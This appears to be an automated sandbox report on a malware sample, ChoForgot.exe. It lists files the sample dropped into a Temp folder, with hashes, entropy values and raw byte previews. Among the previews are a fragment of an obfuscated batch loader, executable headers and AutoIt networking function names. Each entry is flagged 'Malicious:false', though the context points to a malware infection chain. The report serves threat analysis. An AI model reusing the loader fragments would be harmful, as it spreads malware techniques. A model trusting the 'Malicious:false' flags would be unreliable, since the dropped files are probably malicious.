                                                                                                                                                                                                                                                                                                      Preview:Set Eden=l..LSThinkpad-Reprint-Reid-..lUKPh-Hispanic-Anniversary-Savings-Transexual-..KejcCases-Walnut-Tommy-..SreSAssumed-Presently-..LjLos-Services-Costumes-Merit-Bankruptcy-Dj-..UEVmEric-Lb-Likelihood-Bdsm-Weighted-Slip-Keno-Reaction-..Set Machine=D..NiyvElection-Bradford-Road-Cube-Accordance-Changes-Compact-..xkTracks-Scene-Acm-Amateur-Gel-..eqfDc-Provision-Contributing-..vyPromotional-..ZlNQNasa-Facility-..uXdWagner-Started-Systems-Governing-..Set Transexuales=C..zFqaAdditional-Realize-Displayed-Reasonably-Joining-..KfFPrince-Pledge-Pump-Presented-Compressed-..CnReduction-Sperm-Anymore-Announced-Errors-Attacks-Behavior-Canada-Graphs-..SoCargo-Beam-Teach-Further-Washer-Mall-Numbers-..pKCh-Gregory-Paragraphs-Wedding-Maximize-Actress-..RuyGWatches-Prediction-Victims-Pics-Grass-Graphs-Essays-..Set Eg=7..yAnRainbow-Toronto-Offer-..veggResident-Secrets-Adventure-Entitled-Before-Charitable-Nuke-Essentially-Failure-..pQtIInfections-Refrigerator-Dl-Virtual-Activity-Bias-..twZVbulletin-Menu

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Forth.cmd (copy)

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1031), with CRLF line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):25627
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.114528855156142
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:SGOEI0d+AeTq4a+op/8O60bx1BuzHOhgDMf7:SGz3+AWq4hg8O60bdoUp
                                                                                                                                                                                                                                                                                                      MD5:2CBBA7BA80508761F55FFD4BEB853102
                                                                                                                                                                                                                                                                                                      SHA1:FE71788DCA26E77F22548FFC39F01BC8F55D2823
                                                                                                                                                                                                                                                                                                      SHA-256:B5F643DB2B4DFC24718865707806F6DD22D9A54EAE16A603C7FEFFE9D98B49CE
                                                                                                                                                                                                                                                                                                      SHA-512:14AB42B3B60D7E7032B0836D0A53670A2D231200121DA5618B06962A401903720A736DF28D049F7CB3FE21E8DA09ACC6DAFAE5B86BB6AFBD79307D99B80C6C09
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Set Eden=l..LSThinkpad-Reprint-Reid-..lUKPh-Hispanic-Anniversary-Savings-Transexual-..KejcCases-Walnut-Tommy-..SreSAssumed-Presently-..LjLos-Services-Costumes-Merit-Bankruptcy-Dj-..UEVmEric-Lb-Likelihood-Bdsm-Weighted-Slip-Keno-Reaction-..Set Machine=D..NiyvElection-Bradford-Road-Cube-Accordance-Changes-Compact-..xkTracks-Scene-Acm-Amateur-Gel-..eqfDc-Provision-Contributing-..vyPromotional-..ZlNQNasa-Facility-..uXdWagner-Started-Systems-Governing-..Set Transexuales=C..zFqaAdditional-Realize-Displayed-Reasonably-Joining-..KfFPrince-Pledge-Pump-Presented-Compressed-..CnReduction-Sperm-Anymore-Announced-Errors-Attacks-Behavior-Canada-Graphs-..SoCargo-Beam-Teach-Further-Washer-Mall-Numbers-..pKCh-Gregory-Paragraphs-Wedding-Maximize-Actress-..RuyGWatches-Prediction-Victims-Pics-Grass-Graphs-Essays-..Set Eg=7..yAnRainbow-Toronto-Offer-..veggResident-Secrets-Adventure-Entitled-Before-Charitable-Nuke-Essentially-Failure-..pQtIInfections-Refrigerator-Dl-Virtual-Activity-Bias-..twZVbulletin-Menu

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Gradually

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):128000
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.644899820682716
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:M80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHSBRtNPnw:xSCOMVIPPL/sZ7HS3zcNPw
                                                                                                                                                                                                                                                                                                      MD5:B472C3173839488298C86F463853D522
                                                                                                                                                                                                                                                                                                      SHA1:4EA19E681D58DBD02318522523117290E5C34F64
                                                                                                                                                                                                                                                                                                      SHA-256:0FF238B71B54C5F33F282CA1E5C3D448BDC37AD8E67EF818766EAF965EE39B8D
                                                                                                                                                                                                                                                                                                      SHA-512:6B1A0B419229C0E101624D293640E12CA15DE1063EA1ED8F1223072C5071CD952D57E2D7FE88E7F68B295E52B899B3773545B6E7E4FC127D0742814EB2A645E8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:I...(..........t.Q....F;.,...r..f....i..........j........q.Q.<......u.......(...j..4........(...YY...F;.,...r..#.........j..4............YY...F;.....r..$.........j..4............YY...F;.....r..%....q.Q.2.....u..1....q.Q.Y......u..G....q0Q........u..A....q.Q.R......u..Q....q.Q.>......u..Q....F.j..4..R...YY.F..$..G;~.r............=........q.Q......u.^.b....>.O ..t.......O$..t.......v..[......I....v..[...h....j.P.4.....I..4...`.I.......N..y8..t.Q......~..^.......u..O......G.......j.hhiL.hpiL.S..8.I......j..5.$M...W.....d#M...3M..x....=\#M.........(...D$8P....I..=\#M.............f...8D$...\....L$(.r...h.1L..L$...u...L$...t'..iL.W.9...h.$M..L$..d>..W.L$..!...j....u......W.D$<P.t$ .t$4h.iL...4.I.P....I..L$..............t6H...t...........0$M...b#M.............5.#M.....I.......M...j....P...Pj.j..5.#M.....I.......E..0$M..........b#M...P#M..}...... ....N....=h#M....A.....)M...........*....)....=g#M.........E.P...........u..u.QQ..)M....<...=.............................t0..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Improve

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):7591
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.602639969665376
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:192:XAH6N8VEVFJ84kcGNq4/C+Q3ISVSWMZMQ3rw:wrVEVFJ8ZcGwGBk7/UMQ3rw
                                                                                                                                                                                                                                                                                                      MD5:9748FF1C8DD58352459F2451049AF2A2
                                                                                                                                                                                                                                                                                                      SHA1:C0A19F1E749FA58BC03B7207D1BE88D054C6C16D
                                                                                                                                                                                                                                                                                                      SHA-256:F6D4C8EBB3C24D734F4888DF2CECA12F2836BB999F58E78DCD05CFF4B27C135B
                                                                                                                                                                                                                                                                                                      SHA-512:3EB9D6BEAC6EA2C1FD8ECFCBCF159459B0B236B2C997191E84DA058D5162CC9A77D132EBC42FDE26891E13959DDC2A81BC8CC47C97111E42C7E5BA4E6E33EE9F
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...U.%..0...+.......0...U.#..0....:..t-..s....I?..T0...U.......J....F3...1..u...v0...*.H.............{m....p+......)r..)..9...t.Qg..Y.....[A.......|k..H;.^q..w.WP......2lnF.;....}.......X....&-`.d...H*}.)..f..+....";Y.}..#....). .%|.X.[.....tgo..!sN....9v.\...|.)F.....1.I4V(F.......x.t.2.............T.Ia.S..&zp2....5..U..ye.{.$.;..!.f...E...1..70..3...0j0Z1.0...U....BE1.0...U....GlobalSign nv-sa100...U...'GlobalSign CodeSigning CA - SHA256 - G3..8.Hn...04.J0...`.H.e.........0...*.H......1...+.....7...0...+.....7...1.0...+.....7...0/..*.H......1". .g.6..l....#..t.X..n|$>.......0^..+.....7...1P0N.". .A.u.t.o.I.t. .v.3. .S.c.r.i.p.t.(.&https://www.autoitscript.com/autoit3/ 0...*.H............>./.f..m..6.5.f..V..6.......E.]....Q...).S.......A20......|.aH|A..B;.L:..,...<.d>m._.Ij..Fx...2........~,.P.......u.um..S..7c.]..\f....e{W.XM&..*.b.=4..)....C.O).@.....&OX.29\.K.bG..;c-f..:.. .K..u.....O.riW....u5.GU[..zoH.e..i.....0RZ....5....0.....+.....7...1...0.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Ix

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):1717
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.749227871603261
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:24:/yGS9PvCA433C+sCNC1skNkvQfhSHQU2L55e1yb/uBx39lt6DhBhhB4+JvUl:c9n9mTsCNvEQH5O5U1nPKrhBzMl
                                                                                                                                                                                                                                                                                                      MD5:9ADB0CA1567F35D30C412CBE89A53027
                                                                                                                                                                                                                                                                                                      SHA1:A32E1D9EB580CE408943B1D91372091967B18BE9
                                                                                                                                                                                                                                                                                                      SHA-256:29B99F845B00EA87A7DA8B57001BF0561D5C87EBDDA8CAEFAA3248EDD7C87DCA
                                                                                                                                                                                                                                                                                                      SHA-512:986234C956D90C732656DD16DE58B528AF17040364311F89F8D98A45736A7DD9C6394D4C36028B73575DED030654A84512711FA14153F079284508E964F40DA6
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:Duck........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B............................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Kenny

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):76800
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.9974146672703545
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:8oWaK5pdcNjDuej3zspnOXasnVYTnOBihq50CYnO7:8rauMFpzGRsVYrOVbYO7
                                                                                                                                                                                                                                                                                                      MD5:4F00E7D3C58AB52D2C6E8B6935B14E0D
                                                                                                                                                                                                                                                                                                      SHA1:634AAEF4C09CC4F8BE78C7A8D1B7CB72F184C073
                                                                                                                                                                                                                                                                                                      SHA-256:1629FDA7C2ACC6E2C91B128FCD713EFC4282FE6AC169D3804F639C16957EFFF0
                                                                                                                                                                                                                                                                                                      SHA-512:64873A21E2C0A581F9AB4FF6933FABCF117860998E73227340D0666D2C0E7017DE8F57DB8216DD643F9DAF8C11CE73EEF41E986E55EE7B64AAD30435A6D5BDE1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.l.F..*.p.u...3..h..).....W!.L52..q-...O.g....?.....X......+a.d,,......FJ......\.4^.....x.b$J....69..ef._j...+...D.8...;~...g.n......`....O...W.#:<j.t.....o..Ub....f.....4J.f.V.%.t..8.....?R.....{.NGU.?..8...o....H....=*..K~q^.....v..R._s.[U=l.b...=...7'...[. .n+...ST.,'.....(:...4...x..F.;.(c.O..{(]...X......w.....y.....^9.U..<.".=..h..3:..E..{..k=m...$i{.Gj_a......!...1E.:=9IQy.....h...A..^...[.O......U....9.I.T.".F....C&3@.I.,..v.#.}}.....w..d.Ub"E`..2V.Yz..]O.r...Zj=.B.,P...T../.nnX...e......| 9S.\.......{...T.~._...nl.f.&...[_.%r..v....?....@...e..-*.a..>xu.!.k...0.X..K.#.....[.".0...0.?...."..d.....hq.%........6..E.....B.e>. ...Al...T....d3.....'b....G.........V!B<y..h8..OB.EE9.5...yY.U....-..q...hd(.C....O.u%.......5..rB.E'c..i.q.Uv..u...c0.......U..9.4...g.l...oy.H0e..@..a!Wd*G...Tt5.6.Z.....b..&..1....xB....7..-....Cs...A..R.0+...mJ*..-....u..........9.}I.. <Kx2f... ..8.+G.%....R.[.8.ro..WB..>gSI...@.-.7..4i$F..d9...F.G....C

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Loud

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):57344
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996875195710972
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:63o9On+rvzpKXyVh3jr4fOmfqAUgr4L34:649On+rvdhH4Rgg2o
                                                                                                                                                                                                                                                                                                      MD5:8DAAC6F10E63C4E0B8DDDECAF6B8E0EF
                                                                                                                                                                                                                                                                                                      SHA1:39441368910496DC889FE74AE20963E53F08A459
                                                                                                                                                                                                                                                                                                      SHA-256:3A479C5821FCE8189CA2D04B48F7078F2266E8FD80E57CA4B6F4B9B2B724B26F
                                                                                                                                                                                                                                                                                                      SHA-512:7064CD9BBAC4F9B792528B98B1F86BB9A283481F16C85A792D34C0D2F30A9BC4200CDF12EADFFFC6720EF64B2DF4187828DC7DF0E836AEB7BB2AB6CCD022C93C
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.V..6".Zs..F.H7.-~..x...a.i.RM.....u.7.........`e..6.w>+V.^....%....o.~.....L]...OB...=..r..2.m.z....8.../......w.<S.....5....f........Q}....1...>../......v.......soi.D.X.H.........+w.N...q......u..i.u-..|2X.!7A..j......g...C..F.....3......P...;....Z..w^....fql.7.$.H.9....4..Y.v...{.Q.^t.o.;9i..{.a.p`s...C|.^.N..6^.........XZX0.~g.H.5.........S.gH..@.$I.#y`....*......)...=.....KFb.j.VV.C...SeU.....h./.<oG..>l_..$.$...x.\6...I.&46.V:.P..7..yI7.m1...D.......RcF*....P.....i!....}..J.0....J.J5T#3....Gh...5.<t.....].:h..D\..x.|E..`.G5&.Co..t0DC>....6.5B...uI........iN.W..m.{..F.....*.j2...faI~...s/b.n}..a....)..v.z.....d.u.i.......9.cF.C'a/<....."s0Fs.....e.d..z'.d......Ze.'Y.....A.j{@.8....r..F'..9n.A..a,q...%..>..up.R....d..PG.{.F.h(L.E.2...M...+..8.S...).. .(.F......*t U...)|...._..p:......Y.....].o.....A.h.z.O..T..`.9w..A.S.....q..e..JP.~..f...w..?..X.x....f1......<-4x...b..U.4x......yo.0.....|/x..>.N..97.W.1...KpL.C.......'..

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Malawi

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):139264
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.7469999325978085
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:Xh6R8anHsWccd0vtmgMbFuz08QuklMBNIimuzaAwusPf:xq8QLeAg0Fuz08XvBNbjaAtsPf
                                                                                                                                                                                                                                                                                                      MD5:6567D0C4ACA999258D881932A4A6925A
                                                                                                                                                                                                                                                                                                      SHA1:C82D413AA3D63F8B540F5EC85CB6993323C80A39
                                                                                                                                                                                                                                                                                                      SHA-256:B54A2AB660D285AF9F9E829D97A7550B1640803C1BEA965E747E92CB29A54CA3
                                                                                                                                                                                                                                                                                                      SHA-512:4CB7FA0C47009134D29523CFA005541EEB4F755BB884117A25983F3C92BD69A7D4F6499429074F5F9FF0597E4ABC1C08CD804F78BCBB694D84F1BB522EFC5DBA
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:...R.E.G.D.E.L.E.T.E...S.T.R.I.N.G.L.E.N...I.N.I.D.E.L.E.T.E...T.C.P.A.C.C.E.P.T...H.O.T.K.E.Y.S.E.T...T.I.M.E.R.I.N.I.T...S.P.L.A.S.H.O.F.F...W.I.N.F.L.A.S.H.....F.I.L.E.M.O.V.E.....I.S.S.T.R.I.N.G.....O.B.J.E.V.E.N.T.....D.L.L.C.L.O.S.E.....I.N.I.W.R.I.T.E.....I.S.B.I.N.A.R.Y.....B.I.T.S.H.I.F.T.....W.I.N.C.L.O.S.E.....R.E.G.W.R.I.T.E.....I.N.P.U.T.B.O.X.....I.S.N.U.M.B.E.R.....S.H.U.T.D.O.W.N.....F.U.N.C.N.A.M.E.....F.I.L.E.O.P.E.N.....F.I.L.E.C.O.P.Y.....I.N.E.T.R.E.A.D.....S.E.T.E.R.R.O.R.....F.I.L.E.R.E.A.D.....C.E.I.L.I.N.G...W.I.N.M.O.V.E...R.U.N.W.A.I.T...T.O.O.L.T.I.P...W.I.N.K.I.L.L...D.I.R.C.O.P.Y...U.D.P.O.P.E.N...U.D.P.S.E.N.D...R.E.G.R.E.A.D...I.N.I.R.E.A.D...I.S.A.R.R.A.Y...W.I.N.W.A.I.T...T.C.P.R.E.C.V...O.B.J.N.A.M.E...D.L.L.O.P.E.N...E.X.E.C.U.T.E...I.S.F.L.O.A.T...D.L.L.C.A.L.L...U.D.P.R.E.C.V...W.I.N.L.I.S.T...I.S.A.D.M.I.N...C.L.I.P.G.E.T...I.N.E.T.G.E.T...U.D.P.B.I.N.D...D.I.R.M.O.V.E...C.L.I.P.P.U.T...S.R.A.N.D.O.M...M.O.U.S.E.U.P...M.A.P.K.E.Y.S...T.C.P.S.E.N.D

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Promotes

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\ChoForgot.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):64827
                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.996856640307497
                                                                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:04KOkg9KF7yMj2rpQ4oiS+WwWmw1EHw29A:fkgwFGe2ZBr9rQz
                                                                                                                                                                                                                                                                                                      MD5:D46DF033B2AFD716F44E8E9482B0C3F1
                                                                                                                                                                                                                                                                                                      SHA1:058928CF46326C10F4F11BC817C387F4A3AD1A49
                                                                                                                                                                                                                                                                                                      SHA-256:D96C4CC9B7C57E3999B16A9CE661208B6D7782C6D12D9B7054CF737A18765D11
                                                                                                                                                                                                                                                                                                      SHA-512:2436C4733B94A8B8EC58D321FA4533AF7AD1CAE69BD4B5E7CB4E7D50B00FB369FD421664F0F1851F7634CBA86E6ED81622C3099974CED2D81A9279616BAB4F46
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:....k.....M.h.Ew...*.+;T.!6sX..V..@....T....rq/.c..g.X...........].^.l..J......`......6...e.Q.*:.!...k)V..ZC.e.A..b......df..z..jiUD.5.1 .$.cL.......g..(.c|......1.Mv...N......8.).TN.-x....&#..\.~.j..s.....0.4+...<..~r..7..?..\....V?E...R..^d|..8Po.3...O+...]j.....6*..$.'W.."..>m....Z.Zkd.Z.v....X..p.....%.q..0b....x..Ob.>..&......R.U.[..Gk6..D....J..?+..Q....h$...+.i....}.es.h...T....;*.@.w.t....x...!75..<..+.}'b.HE~../..Q.E..f....8>..n...=.D[.7. <...S..s......x.....m.=.4r@^.Mb......M.. I..4h....RI..jR..c..96.\..RO...Z?.8.aX0..s@.Rs....d.....m.Q.iT..*..0.zWDJ..j~....:............F|n&!.e.L.~=3...|...z...:m.i3.,.....s.gr.V..h.z...AnZ..V....P..E.d..?.m...0.....6r..y.W.....Y.R.L }..Yg.phf....D.j;Y..:.zw....:..U].-..o...(.......U.."%=.F.ye...S%.-.c.. 6..=..l.....~j...^. ..5.w..s......J.....b.}.7...'...1..3..z.;+.4......br.6-P.$.z72.~^..U@.............dl.g..........;..E.-............V...."w.iEcA..9&....../..B..3..=..S`A...F[.!.a6C.H.2.[(..g.e.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Publicity

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):88064
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.712983512179883
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:KeOypvcLSDOSpZ+Sh+I+FrbCyI7P4Cxi8q0vQEcmFdnp:KeOyKODOSpQSAU4CE0Imbp
                                                                                                                                                                                                                                                                                                      MD5:FF2CEEC537D5B6F00E079F35A28ECA2F
                                                                                                                                                                                                                                                                                                      SHA1:02E6B54BF4BB40E8AA2E633331F1A6FCB8E4FD43
                                                                                                                                                                                                                                                                                                      SHA-256:A42A43439F637DB2CD812FCF086388808BBF5DD103E7E7D20590707D0C38597E
                                                                                                                                                                                                                                                                                                      SHA-512:26BFA8B19D875D41601F538A99D4EAA0FC04388F6D0689E2B4D22607AAC5261E03E42D2E2804690CE1D6FC3A9317A969B1D0D94568CBD6A73843E7FDEFC1989B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.E.x..~...M.....E.Q...P.....YY..t..E.E.3.j..]..E.Y...\...3...*...3..].A.E.f.E..U..E..E.j..p.j.RQ.M.Q.u........E.P.d.....$..u.8E...g....E.P.....X......u..}....E.t+.M.P........U...E......}..t..M.P......[..]..U...u.j..u..t............]..U...u.h.....u........]..U...M...t.j..u......YY.....M..A....w... ..]..U..f.M......f..f#.f;.u3.E.QQ..$...YY...t....t....t.3.@].j...j.X].....].........f..u..E.....u..}..t...........]..E.........Dz........A@]................]..U..QQ..VW.....Wh?....].....YY..M.......#.f;.u\.E.QQ..$....YY...t<...t).E....tX...CL.V......\$...$j.j..........7WV.|....E....'WV.n....E....E.%.....E..E.WV.E..Q....E.YY_^..].............=0#M.............\$..D$.%....=....u..<$f..$f...f....d$.uZ......=0#M..t2.....\$..D$.%....=....u..<$f..$f...f....d$.u..u..........$.T$..D$..........T$........P..<$f.<$..t............T$...................................L$.....R.............u....=.!M...........#J.......D....=.!M..........#J..........Z.T$..x.......z.t.A.1.

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Trademarks

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):89088
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.388500801928956
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:2ueoMmOrrHL/uDoiouK+r5bLmbZzW9FfTubb1/Dde6YF640L6wy4Za9IN3YRYfvW:2ueoMmOqDoioO5bLezW9FfTut/Dde6u7
                                                                                                                                                                                                                                                                                                      MD5:0D9676B0ACE617D2F4B1E3D382FFF695
                                                                                                                                                                                                                                                                                                      SHA1:5B60C826A38C70430BAB8017B76A27D945FBDBE3
                                                                                                                                                                                                                                                                                                      SHA-256:738D4B9E1C15109B85D7F0A06748DCF4EC018A0EF4ABE917552F59A84AE6C03D
                                                                                                                                                                                                                                                                                                      SHA-512:B81D208D807634B9BE1FC42F036FD4DA41E50F84EDD232B736F8588B22C5A4CF7534196CE6C873F2E9BAB264AD4A11A9F5CBD3E6037E85DAE58E766E81369188
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:M.P.D$.j..@.@P.....3M..[...F0.L$....t....t..['.........l+.....(M..=.(M..5.(M..L$...a#M....}%M..G....._^[..]...U....SVW.u..0..............N.;N........u..M..&....v.......N 3..E.9~.~h3............M........t..E..@....f.x.@uB....E..@....f.x.3u/.M.;.t..0.#....M..E.P.....M.........G;~.|......M.....2._^[....U..j..u..u.....]...U..j..u..u.....]...U..E.VW...@....i).......xJ;.....}B.............t3h....j..p...|.I..............t.Q............... ....u....!F...&..F....._3.^]...U..E.V..@.....(....~.;......&.......u.W.D......x...E...>.F....._...u.....E...&..F.....3.^]...U......\SVW..h@....\$$.>`..Y3.D$..D$..H..H..H..H.....I..E..L$..@..p........N....D$8.A..D$<.A..D$@.A..L$8.D$D...b!...t$<.=..I..t$<..M..A..p....9....N....D$(.A..D$,.A..D$0.A..L$(.D$4....!...t$,.t$,.......3..|$$...t.........98t.A...;.r.L$$;.u..D$.P...........|$..|$..........|$.....8.E..@..0..~..u..D$XP.x...d$..3.F.3.....N..D$........D$H.A..D$L.A..D$P.A..D$T...D$H3.WP.............|$...D$.t..L$H.......t..L$X......

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Wal

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):121856
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.331012340919701
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3072:iZg5PXPeiR6MKkjGWoUlJUPdgQa8Bp/LxyA3laW2UDt:iK5vPeDkjGgQaE/loUDt
                                                                                                                                                                                                                                                                                                      MD5:19046E554A09E864445F82438D104A1A
                                                                                                                                                                                                                                                                                                      SHA1:0706E729F7A4E535050DFF2B2830781AFC47D38E
                                                                                                                                                                                                                                                                                                      SHA-256:05F50AB0792F99E7D107EC120F436A093D94D97B75BCDE861E19FA29F842C8F1
                                                                                                                                                                                                                                                                                                      SHA-512:2C9C9385BCEC66BA5DD11DFF14E383F72FC67E3BE3F3529CBAE8B2A4741F13B1B931A692C4B6F7BA2A5A0A9958141F7E6100D0EA631FEEE887FA6D279AD2E24A
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.................l.....p.....t.....x.....|...........................f.............................................................._......^[.U..SV..j.[.F.9F.u0...j.X;.sF3.F...W.......Q......~....Y.......~._S.....Y.M......V..N.....F.^[]......U..QQ.}..........L)M....tv.}.........@)M.3.VW.}.B....U..0...E............}..t .M.......~L........E.j.P.FL......E....u..E ...u..~8...q....._^....3....FP..FT..U...u...(M..K...P.....j.j.j..u...x.I.]...U..Q.@)M.V.u.Wj.....8W.z...............d)M.j.Z.U.;........T)M.....0.........F.;G.u{............8......../.....................VW......~d...(....~h...0....~D...8....~P...@....>.t..6..<.I..&..u........d)M..U.B.U.;..._....u... .........$.........@)M........t.Q.=.....@)M..... ..5.)M..E.N.5.)M.;.L)M.u...L)M....D)M.........._..^u..5.)M.j.....I..%.)M....D)M...t..@)M..D...8.u..<)M...........U..E.VW.@......P......u..........>3._.F.....^]...U......`.D$.V.u.WP.D$.PV..............L$..@)M..T$..L$........T)M..L$.....8.|$..............'........P............H

                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Wordpress

                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):71680
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.5689247031942015
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:9PrpmESvn+pqFqaynB6GMKY99z+ajU1Rjv18fRQLTh/5fhj2:hpmESv+AqVnBypIbv18mLthfhS
                                                                                                                                                                                                                                                                                                      MD5:DE0BE63D4A9CD3B9D4137EC3C72D0951
                                                                                                                                                                                                                                                                                                      SHA1:19F744279539DD41F4E591C5EFE35101F3A7F5BC
                                                                                                                                                                                                                                                                                                      SHA-256:6F2D36E5713CD1A319A8CE22171B16C95C9D0C3D7F75FF6A93E1EBDF19DC8977
